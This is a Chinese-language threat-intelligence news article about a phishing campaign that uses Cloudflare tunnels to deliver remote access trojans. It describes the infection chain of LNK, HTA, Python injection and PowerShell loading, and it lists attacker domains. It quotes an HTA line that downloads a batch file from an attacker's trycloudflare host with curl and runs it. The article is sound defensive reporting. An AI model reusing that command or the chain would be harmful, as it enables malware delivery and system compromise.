網絡安全專家發(fā)現一起復雜攻擊活動，攻擊者利用Cloudflare的隧道基礎設施分發(fā)多種遠程訪問木馬（RAT）。

該基礎設施自2024年2月以來展現出極強的持久性，作為惡意文件和木馬的分發(fā)平臺，使攻擊者能夠未經授權訪問受害者系統(tǒng)。

包括Forcepoint、Fortinet、Orange和Proofpoint在內的安全廠商已記錄這一持續(xù)性威脅，強調其不斷演變的特性以及對全球組織日益增長的影響。

初始感染途徑

主要感染途徑始于包含惡意附件的釣魚郵件，這些附件偽裝成發(fā)票或訂單文件。

這類郵件通常制造虛假緊迫感，并可能包含偽造的對話記錄和回復以顯得真實可信。

附件通常采用"application/windows-library+xml"文件格式，由于相比二進制文件看似無害，經常能繞過電子郵件安全網關。

當用戶打開文件時，會建立與托管在Cloudflare隧道基礎設施上的遠程WebDav資源的連接。

攻擊基礎設施分析

Sekoia威脅檢測與研究（TDR）團隊持續(xù)監(jiān)控這一攻擊基礎設施，內部代號為"Cloudflare隧道基礎設施傳播多種RAT"。

分析顯示，攻擊采用復雜的多階段感染鏈，運用多種混淆技術規(guī)避檢測系統(tǒng)。這種復雜性表明，即便在2025年，威脅行為體仍在開發(fā)創(chuàng)新方法來繞過現代安全控制措施。

攻擊者利用帶有"trycloudflare.com"后綴的域名（如"malawi-light-pill-bolt.trycloudflare.com"和"players-time-corresponding-th.trycloudflare.com"等）托管惡意內容。該基礎設施最終投放的載荷會在受感染系統(tǒng)上建立持久遠程訪問，可能導致數據竊取和進一步網絡入侵。

感染鏈技術細節(jié)

感染過程始于用戶與偽裝成PDF文檔的LNK文件交互。該快捷方式并非打開合法文檔，而是從同一遠程服務器執(zhí)行HTA文件。HTA內容揭示攻擊進展：

`Set oShell = CreateObject("WScript.Shell") oShell.Run "cmd. exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false self. Close`

此腳本觸發(fā)BAT文件安裝Python并執(zhí)行混淆的Python代碼，隨后將下一階段載荷注入"notepad.exe"進程。

注入notepad.exe進程（來源：Sekoia）

為實現持久化，惡意軟件創(chuàng)建啟動項，包含兩個VBS文件和另一個放置在Windows啟動文件夾中的BAT文件。

最終階段使用PowerShell反射加載從JPEG圖像下載的載荷（內含base64編碼的載荷），通過"duckdns.org"等動態(tài)DNS服務建立與命令控制服務器的RAT連接。

感染鏈示意圖（來源：Sekoia）

通過涉及Windows-library文件、LNK文件、HTA執(zhí)行和Python注入的復雜多階段過程分發(fā)AsyncRAT的感染鏈

該攻擊活動的演變表明，威脅行為體持續(xù)調整技術以繞過安全控制，凸顯了采用多層檢測方法和持續(xù)監(jiān)控類似攻擊模式的重要性。